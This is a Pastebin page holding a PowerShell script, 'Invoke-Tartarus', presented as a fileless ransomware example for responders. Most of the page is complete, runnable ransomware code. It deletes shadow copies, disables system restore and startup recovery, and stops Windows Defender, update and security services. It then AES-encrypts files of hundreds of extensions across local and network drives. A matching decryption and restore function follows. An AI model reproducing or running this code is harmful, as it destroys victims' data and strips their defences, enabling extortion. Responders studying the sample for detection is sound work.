API tools faq
paste
FlyFar

Invoke-Tartarus.ps1 - Fileless Ransomware Example

FlyFar
Dec 24th, 2023 (edited)
32
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PowerShell 15.46 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. set-strictMode -version 2.0
  2.  
  3. function Invoke-Tartarus
  4. {
  5. <#
  6.  
  7. .DISCLAIMER
  8.  
  9. Warning! Use at your own risk! This script is an example of actual threat and was created to help responder to understand them.
  10.  
  11. Any action and/or activities related to the material contained within this blog is solely your responsibility. The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.
  12.  
  13. This script is published for educational use only. I am no way responsible for any misuse of the information.
  14.  
  15. .SYNOPSIS
  16.  
  17. Fileless "Ransomware" example.
  18.  
  19. Author: @pabraeken
  20.  
  21. License: BSD 3-Clause
  22.  
  23. .DESCRIPTION
  24.  
  25. Tartarus is expected to be launched from an Empire agent and therefore from the memory. It uses symmetric encryption and the key is store into the memory. This kind of attack is extremely challenging as it's bypass traditionnal malware detection by running directly in memory. The ransomware can be configured to run with a specific execution time and then it kills itself.
  26.  
  27. .PARAMETER MaxExecutionTime
  28.  
  29. This parameter allows to configure the malware execution time before killing itself
  30.  
  31. .PARAMETER IV
  32.  
  33. Initialization vector.
  34.  
  35. .PARAMETER Key
  36.  
  37. The encryption key.
  38.  
  39. .EXAMPLE
  40. > Invoke-Tartarus -MaxExecutionTime 3600 -IV 'RvQUR/CILm1UiQN/u+BABA==' -Key 'lvk3AlqoxLFbKjHXTuHs500WEM7Y+6zAX1Y/F7kD+5U='
  41. Executes the malware for 3600 seconds then the malware kills itself.
  42.  
  43. #>
  44. Param(
  45.     [Parameter(Position = 0)]
  46.     [int]
  47.     $MaxExecutionTime=300,
  48.  
  49.     [Parameter(ParameterSetName = "IV", Position = 1)]
  50.     [String]
  51.     $IV,
  52.  
  53.     [Parameter(ParameterSetName = "IV", Position = 2)]
  54.     [String]
  55.     $Key
  56. )
  57.     $stopWatch = [system.diagnostics.stopwatch]::StartNew()        
  58.  
  59.     # Manage to delete all snapshots on the target machine and disable the related Windows service
  60.     # Remove all snapshots
  61.     gwmi Win32_Shadowcopy|%{if($($_.ClientAccessible) -eq "True"){$_.Delete()}};
  62.     # Stop the Volume Snapshot Service
  63.     spsv vss -ErrorAction SilentlyContinue;
  64.     # Disable the Volume Snapshot Service
  65.     if(((gwmi -Query "Select StartMode From Win32_Service Where Name='vss'").StartMode) -ne "Disabled"){
  66.     set-service vss -StartupType Disabled};
  67.  
  68.     # Disable recovery options
  69.     # Disable Startup Repair from trying to start when a problem is detected
  70.     bcdedit /set recoveryenabled No|Out-Null;
  71.     # Disable Windows recovery at startup
  72.     bcdedit /set bootstatuspolicy ignoreallfailures|Out-Null;
  73.  
  74.     # Stop and disable the services Wscsvc - WinDefend - Wuauserv - BITS - ERSvc - WerSvc
  75.     spsv Wscsvc -ErrorAction SilentlyContinue;
  76.     if(((gwmi -Query "Select StartMode From Win32_Service Where Name='Wscsvc'").StartMode) -ne "Disabled"){
  77.     set-service Wscsvc -StartupType Disabled};
  78.     spsv WinDefend -ErrorAction SilentlyContinue;
  79.     if(((gwmi -Query "Select StartMode From Win32_Service Where Name='WinDefend'").StartMode) -ne "Disabled"){
  80.     set-service WinDefend -StartupType Disabled};
  81.     spsv Wuauserv -ErrorAction SilentlyContinue;
  82.     if(((gwmi -Query "Select StartMode From Win32_Service Where Name='Wuauserv'").StartMode) -ne "Disabled"){
  83.     set-service Wuauserv -StartupType Disabled};
  84.     spsv BITS -ErrorAction SilentlyContinue;
  85.     if(((gwmi -Query "Select StartMode From Win32_Service Where Name='BITS'").StartMode) -ne "Disabled"){
  86.     set-service BITS -StartupType Disabled};
  87.     spsv ERSvc -ErrorAction SilentlyContinue;
  88.     if(((gwmi -Query "Select StartMode From Win32_Service Where Name='ERSvc'").StartMode) -ne "Disabled"){
  89.     set-service ERSvc -StartupType Disabled};
  90.     spsv WerSvc -ErrorAction SilentlyContinue;
  91.     if(((gwmi -Query "Select StartMode From Win32_Service Where Name='WerSvc'").StartMode) -ne "Disabled"){
  92.     set-service WerSvc -StartupType Disabled};
  93.  
  94.     $hklm=2147483650;$hkcu = 2147483649;
  95.     $reg=[WMIClass]"ROOT\DEFAULT:StdRegProv";
  96.     # Disable the security center notifications
  97.     $key="SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellServiceObjects\{FD6905CE-952F-41F1-9A6F-135D9C6622CC}";
  98.     $reg.DeleteKey($hklm, $key)|out-null;
  99.     # Disable the system restore
  100.     $key="SOFTWARE\Microsoft\Windows\CurrentVersion\SystemRestore";
  101.     $reg.CreateKey($hklm, $key)|out-null;
  102.     $reg.SetDWORDValue($hklm, $key, "DisableSR", "1")|out-null;
  103.     # To hide Windows Defender notification icon
  104.     $key="SOFTWARE\Microsoft\Windows\CurrentVersion\Run";
  105.     $reg.DeleteValue($hklm, $key, "WindowsDefender")|out-null;
  106.     $key="SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run";
  107.     $reg.DeleteValue($hklm, $key, "WindowsDefender")|out-null;
  108.     $key="SOFTWARE\Microsoft\Windows\CurrentVersion\Run";
  109.     $reg.DeleteValue($hkcu, $key, "Windows Defender")|out-null;
  110.     $key="SOFTWARE\Policies\Microsoft\Windows Defender";
  111.     $reg.SetDWORDValue($hklm, $key, "DisableAntiSpyware", "1")|out-null;
  112.  
  113.     $aesManaged=new-object "System.Security.Cryptography.AesManaged";
  114.     $aesManaged.Mode=[System.Security.Cryptography.CipherMode]::CBC;
  115.     $aesManaged.Padding=[System.Security.Cryptography.PaddingMode]::Zeros;
  116.     $aesManaged.BlockSize=128;
  117.     $aesManaged.KeySize=256;
  118.     $aesManaged.IV=[System.Convert]::FromBase64String($IV);
  119.     $aesManaged.Key=[System.Convert]::FromBase64String($Key);
  120.     $encryptor=$aesManaged.CreateEncryptor();
  121.     $drives=gwmi Win32_LogicalDisk -Filter "DriveType=3 or DriveType=4"|select Name;
  122.     foreach($drive in $drives){
  123.         $files=gci "$($drive.Name)" -Recurse -Include *.contact,*.dbx,*.doc,*.docx,*.jnt,*.jpg,*.mapimail,*.msg,*.oab,*.ods,*.pdf,*.pps,*.ppsm,*.ppt,*.pptm,*.prf,*.pst,*.rar,*.rtf,*.txt,*.wab,*.xls,*.xlsx,*.xml,*.zip,*.1cd,*.3ds,*.3g2,*.3gp,*.7z,*.7zip,*.accdb,*.aoi,*.asf,*.asp,*.aspx,*.asx,*.avi,*.bak,*.cer,*.cfg,*.class,*.config,*.css,*.csv,*.db,*.dds,*.dwg,*.dxf,*.flf,*.flv,*.html,*.idx,*.js,*.key,*.kwm,*.laccdb,*.ldf,*.lit,*.m3u,*.mbx,*.md,*.mdf,*.mid,*.mlb,*.mov,*.mp3,*.mp4,*.mpg,*.obj,*.odt,*.pages,*.php,*.psd,*.pwm,*.rm,*.safe,*.sav,*.save,*.sql,*.srt,*.swf,*.thm,*.vob,*.wav,*.wma,*.wmv,*.xlsb,*.3dm,*.aac,*.ai,*.arw,*.c,*.cdr,*.cls,*.cpi,*.cpp,*.cs,*.db3,*.docm,*.dot,*.dotm,*.dotx,*.drw,*.dxb,*.eps,*.fla,*.flac,*.fxg,*.java,*.m,*.m4v,*.max,*.mdb,*.pcd,*.pct,*.pl,*.potm,*.potx,*.ppam,*.ppsm,*.ppsx,*.pptm,*.ps,*.pspimage,*.r3d,*.rw2,*.sldm,*.sldx,*.svg,*.tga,*.wps,*.xla,*.xlam,*.xlm,*.xlr,*.xlsm,*.xlt,*.xltm,*.xltx,*.xlw,*.act,*.adp,*.al,*.bkp,*.blend,*.cdf,*.cdx,*.cgm,*.cr2,*.crt,*.dac,*.dbf,*.dcr,*.ddd,*.design,*.dtd,*.fdb,*.fff,*.fpx,*.h,*.iif,*.indd,*.jpeg,*.mos,*.nd,*.nsd,*.nsf,*.nsg,*.nsh,*.odc,*.odp,*.oil,*.pas,*.pat,*.pef,*.pfx,*.ptx,*.qbb,*.qbm,*.sas7bdat,*.say,*.st4,*.st6,*.stc,*.sxc,*.sxw,*.tlg,*.wad,*.xlk,*.aiff,*.bin,*.bmp,*.cmt,*.dat,*.dit,*.edb,*.flvv,*.gif,*.groups,*.hdd,*.hpp,*.log,*.m2ts,*.m4p,*.mkv,*.mpeg,*.ndf,*.nvram,*.ogg,*.ost,*.pab,*.pdb,*.pif,*.png,*.qed,*.qcow,*.qcow2,*.rvt,*.st7,*.stm,*.vbox,*.vdi,*.vhd,*.vhdx,*.vmdk,*.vmsd,*.vmx,*.vmxf,*.3fr,*.3pr,*.ab4,*.accde,*.accdr,*.accdt,*.ach,*.acr,*.adb,*.ads,*.agdl,*.ait,*.apj,*.asm,*.awg,*.back,*.backup,*.backupdb,*.bank,*.bay,*.bdb,*.bgt,*.bik,*.bpw,*.cdr3,*.cdr4,*.cdr5,*.cdr6,*.cdrw,*.ce1,*.ce2,*.cib,*.craw,*.crw,*.csh,*.csl,*.db_journal,*.dc2,*.dcs,*.ddoc,*.ddrw,*.der,*.des,*.dgc,*.djvu,*.dng,*.drf,*.dxg,*.eml,*.erbsql,*.erf,*.exf,*.ffd,*.fh,*.fhd,*.gray,*.grey,*.gry,*.hbk,*.ibank,*.ibd,*.ibz,*.iiq,*.incpas,*.jpe,*.kc2,*.kdbx,*.kdc,*.kpdx,*.lua,*.mdc,*.mef,*.mfw,*.mmw,*.mny,*.moneywell,*.mrw,*.myd,*.ndd,*.nef,*.nk2,*.nop,*.nrw,*.ns2,*.ns3,*.ns4,*.nwb,*.nx2,*.nxl,*.nyf,*.odb,*.odf,*.odg,*.odm,*.orf,*.otg,*.oth,*.otp,*.ots,*.ott,*.p12,*.p7b,*.p7c,*.pdd,*.pem,*.plus_muhd,*.plc,*.pot,*.pptx,*.psafe3,*.py,*.qba,*.qbr,*.qbw,*.qbx,*.qby,*.raf,*.rat,*.raw,*.rdb,*.rwl,*.rwz,*.s3db,*.sd0,*.sda,*.sdf,*.sqlite,*.sqlite3,*.sqlitedb,*.sr2,*.srf,*.srw,*.st5,*.st8,*.std,*.sti,*.stw,*.stx,*.sxd,*.sxg,*.sxi,*.sxm,*.tex,*.wallet,*.wb2,*.wpd,*.x11,*.x3f,*.xis,*.ycbcra,*.yuv;
  124.         foreach($file in $files) {
  125.             $bytes=[System.IO.File]::ReadAllBytes($($file.FullName));
  126.             $encryptedData=$encryptor.TransformFinalBlock($bytes, 0, $bytes.Length);
  127.             [byte[]] $fullData=$aesManaged.IV + $encryptedData;
  128.             [System.IO.File]::WriteAllBytes($($file.FullName),$fullData)        
  129.             if($stopWatch.Elapsed.TotalSeconds -ge $MaxExecutionTime){
  130.                 $aesManaged.Dispose()
  131.                 Stop-Process -Id $Pid -Force
  132.             }
  133.         }
  134.     };
  135.     $aesManaged.Dispose()
  136.     Stop-Process -Id $Pid -Force
  137. }
  138.  
  139. function Create-AesManagedObject() {
  140. <#
  141. .SYNOPSIS
  142.  
  143. Create an Aes Managed Object
  144.  
  145. Author: @pabraeken
  146.  
  147. License: BSD 3-Clause
  148. #>
  149.     $aesManaged = New-Object "System.Security.Cryptography.AesManaged"
  150.     $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
  151.     $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
  152.     $aesManaged.BlockSize = 128
  153.     $aesManaged.KeySize = 256
  154.    
  155.     $aesManaged
  156. }
  157. function Create-AesKey() {
  158. <#
  159. .SYNOPSIS
  160.  
  161. Create an Aes Key Object
  162.  
  163. Author: @pabraeken
  164.  
  165. License: BSD 3-Clause
  166.  
  167. .Example
  168. $key = Create-AesKey
  169. $key.IV
  170. $key.Key
  171.  
  172. Output:
  173. bYsk6zmJmWtt8pZFC9wVuw==
  174. eZpMGPKSeOkhbm1qexalV5rFjKB7MF7MUIu/sbrZEN8=
  175. #>
  176.     $aesManaged = Create-AesManagedObject
  177.     $aesManaged.GenerateKey()
  178.     $aesObject = New-Object PSObject
  179.     $IV =  [System.Convert]::ToBase64String($aesManaged.IV)
  180.     Add-Member -InputObject $aesObject -MemberType NoteProperty -Name "IV" -Value $IV    
  181.     $key = [System.Convert]::ToBase64String($aesManaged.Key)
  182.     Add-Member -InputObject $aesObject -MemberType NoteProperty -Name "Key" -Value $key
  183.     $aesObject
  184. }
  185.  
  186. function Invoke-AntiTartarus
  187. {
  188. <#
  189. .SYNOPSIS
  190.  
  191. Recover from the attack.
  192.  
  193. Author: @pabraeken
  194.  
  195. License: BSD 3-Clause
  196.  
  197. .DESCRIPTION
  198.  
  199. .PARAMETER IV
  200.  
  201. Initialization vector.
  202.  
  203. .PARAMETER Key
  204.  
  205. The encryption key.
  206.  
  207. .EXAMPLE
  208. > Invoke-AntiTartarus -IV 'RvQUR/CILm1UiQN/u+BABA==' -Key 'lvk3AlqoxLFbKjHXTuHs500WEM7Y+6zAX1Y/F7kD+5U='
  209.  
  210. #>
  211. Param(
  212.     [Parameter(ParameterSetName = "IV", Position = 0)]
  213.     [String]
  214.     $IV,
  215.  
  216.     [Parameter(ParameterSetName = "IV", Position = 1)]
  217.     [String]
  218.     $Key
  219. )
  220.     $IV = [System.Convert]::FromBase64String("RvQUR/CILm1UiQN/u+BABA==")
  221.     $aesManaged = New-Object "System.Security.Cryptography.AesManaged"
  222.     $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
  223.     $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
  224.     $aesManaged.BlockSize = 128
  225.     $aesManaged.KeySize = 256
  226.     $aesManaged.IV = $IV
  227.     $aesManaged.Key = [System.Convert]::FromBase64String("lvk3AlqoxLFbKjHXTuHs500WEM7Y+6zAX1Y/F7kD+5U=")  
  228.     $decryptor = $aesManaged.CreateDecryptor();
  229.     $drives = Get-WmiObject Win32_LogicalDisk -Filter "DriveType=3 or DriveType=4" | Select Name
  230.     foreach($drive in $drives){
  231.         $files = get-childitem "$($drive.Name)" -Recurse -Include *.contact,*.dbx,*.doc,*.docx,*.jnt,*.jpg,*.mapimail,*.msg,*.oab,*.ods,*.pdf,*.pps,*.ppsm,*.ppt,*.pptm,*.prf,*.pst,*.rar,*.rtf,*.txt,*.wab,*.xls,*.xlsx,*.xml,*.zip,*.1cd,*.3ds,*.3g2,*.3gp,*.7z,*.7zip,*.accdb,*.aoi,*.asf,*.asp,*.aspx,*.asx,*.avi,*.bak,*.cer,*.cfg,*.class,*.config,*.css,*.csv,*.db,*.dds,*.dwg,*.dxf,*.flf,*.flv,*.html,*.idx,*.js,*.key,*.kwm,*.laccdb,*.ldf,*.lit,*.m3u,*.mbx,*.md,*.mdf,*.mid,*.mlb,*.mov,*.mp3,*.mp4,*.mpg,*.obj,*.odt,*.pages,*.php,*.psd,*.pwm,*.rm,*.safe,*.sav,*.save,*.sql,*.srt,*.swf,*.thm,*.vob,*.wav,*.wma,*.wmv,*.xlsb,*.3dm,*.aac,*.ai,*.arw,*.c,*.cdr,*.cls,*.cpi,*.cpp,*.cs,*.db3,*.docm,*.dot,*.dotm,*.dotx,*.drw,*.dxb,*.eps,*.fla,*.flac,*.fxg,*.java,*.m,*.m4v,*.max,*.mdb,*.pcd,*.pct,*.pl,*.potm,*.potx,*.ppam,*.ppsm,*.ppsx,*.pptm,*.ps,*.pspimage,*.r3d,*.rw2,*.sldm,*.sldx,*.svg,*.tga,*.wps,*.xla,*.xlam,*.xlm,*.xlr,*.xlsm,*.xlt,*.xltm,*.xltx,*.xlw,*.act,*.adp,*.al,*.bkp,*.blend,*.cdf,*.cdx,*.cgm,*.cr2,*.crt,*.dac,*.dbf,*.dcr,*.ddd,*.design,*.dtd,*.fdb,*.fff,*.fpx,*.h,*.iif,*.indd,*.jpeg,*.mos,*.nd,*.nsd,*.nsf,*.nsg,*.nsh,*.odc,*.odp,*.oil,*.pas,*.pat,*.pef,*.pfx,*.ptx,*.qbb,*.qbm,*.sas7bdat,*.say,*.st4,*.st6,*.stc,*.sxc,*.sxw,*.tlg,*.wad,*.xlk,*.aiff,*.bin,*.bmp,*.cmt,*.dat,*.dit,*.edb,*.flvv,*.gif,*.groups,*.hdd,*.hpp,*.log,*.m2ts,*.m4p,*.mkv,*.mpeg,*.ndf,*.nvram,*.ogg,*.ost,*.pab,*.pdb,*.pif,*.png,*.qed,*.qcow,*.qcow2,*.rvt,*.st7,*.stm,*.vbox,*.vdi,*.vhd,*.vhdx,*.vmdk,*.vmsd,*.vmx,*.vmxf,*.3fr,*.3pr,*.ab4,*.accde,*.accdr,*.accdt,*.ach,*.acr,*.adb,*.ads,*.agdl,*.ait,*.apj,*.asm,*.awg,*.back,*.backup,*.backupdb,*.bank,*.bay,*.bdb,*.bgt,*.bik,*.bpw,*.cdr3,*.cdr4,*.cdr5,*.cdr6,*.cdrw,*.ce1,*.ce2,*.cib,*.craw,*.crw,*.csh,*.csl,*.db_journal,*.dc2,*.dcs,*.ddoc,*.ddrw,*.der,*.des,*.dgc,*.djvu,*.dng,*.drf,*.dxg,*.eml,*.erbsql,*.erf,*.exf,*.ffd,*.fh,*.fhd,*.gray,*.grey,*.gry,*.hbk,*.ibank,*.ibd,*.ibz,*.iiq,*.incpas,*.jpe,*.kc2,*.kdbx,*.kdc,*.kpdx,*.lua,*.mdc,*.mef,*.mfw,*.mmw,*.mny,*.moneywell,*.mrw,*.myd,*.ndd,*.nef,*.nk2,*.nop,*.nrw,*.ns2,*.ns3,*.ns4,*.nwb,*.nx2,*.nxl,*.nyf,*.odb,*.odf,*.odg,*.odm,*.orf,*.otg,*.oth,*.otp,*.ots,*.ott,*.p12,*.p7b,*.p7c,*.pdd,*.pem,*.plus_muhd,*.plc,*.pot,*.pptx,*.psafe3,*.py,*.qba,*.qbr,*.qbw,*.qbx,*.qby,*.raf,*.rat,*.raw,*.rdb,*.rwl,*.rwz,*.s3db,*.sd0,*.sda,*.sdf,*.sqlite,*.sqlite3,*.sqlitedb,*.sr2,*.srf,*.srw,*.st5,*.st8,*.std,*.sti,*.stw,*.stx,*.sxd,*.sxg,*.sxi,*.sxm,*.tex,*.wallet,*.wb2,*.wpd,*.x11,*.x3f,*.xis,*.ycbcra,*.yuv        
  232.         foreach($file in $files) {  
  233.             $fileToDecrypt = $file.FullName        
  234.             $encryptedFile = [System.IO.File]::ReadAllBytes($fileToDecrypt)    
  235.             $bytes = $encryptedFile #[System.Convert]::FromBase64String($encryptedFile)
  236.             $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16);
  237.             #$unencryptedData = [System.Text.Encoding]::UTF8.GetString($unencryptedData).Trim([char]0)
  238.             [System.IO.File]::WriteAllBytes($fileToDecrypt,$unencryptedData)      
  239.         }
  240.     }
  241.     $aesManaged.Dispose()  
  242.  
  243.     # Restore Windows Services
  244.     Set-Service vss -StartupType Manual
  245.     Set-Service Wscsvc -StartupType Automatic
  246.     Set-Service WinDefend -StartupType Automatic
  247.     Set-Service Wuauserv -StartupType Automatic
  248.     Set-Service BITS -StartupType Automatic
  249.     Set-Service ERSvc -StartupType Automatic
  250.     Set-Service WerSvc -StartupType Automatic  
  251.  
  252.     # Restore recovery options
  253.     # Enable Startup Repair
  254.     bcdedit /set recoveryenabled Yes|Out-Null;
  255.     # Enable Windows recovery at startup
  256.     bcdedit /set bootstatuspolicy DisplayAllFailures|Out-Null;
  257.  
  258.     $hklm=2147483650;$hkcu = 2147483649;
  259.     $reg=[WMIClass]"ROOT\DEFAULT:StdRegProv";
  260.     # Restore the security center notifications
  261.     $key="SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellServiceObjects\{FD6905CE-952F-41F1-9A6F-135D9C6622CC}";
  262.     $reg.CreateKey($hklm, $key)|out-null;
  263.     # Enable the system restore
  264.     $key="SOFTWARE\Microsoft\Windows\CurrentVersion\SystemRestore";    
  265.     $reg.SetDWORDValue($hklm, $key, "DisableSR", "")|out-null;
  266.  
  267.     $key="SOFTWARE\Policies\Microsoft\Windows Defender";
  268.     $reg.SetDWORDValue($hklm, $key, "DisableAntiSpyware", "")|out-null;
  269.  
  270.     $key="SOFTWARE\Microsoft\Windows\CurrentVersion\Run";
  271.     $reg.SetExpandedStringValue($hklm, $key, "WindowsDefender", "%ProgramFiles%\Windows Defender\MSASCuiL.exe")|out-null;            
  272.     $key="SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run";
  273.     $stRestore = ([byte[]](0x06,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
  274.     $reg.SetBinaryValue($hklm, $key, "WindowsDefender", $stRestore)|out-null;
  275. }
Tags: malware ransomware Example fileless
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!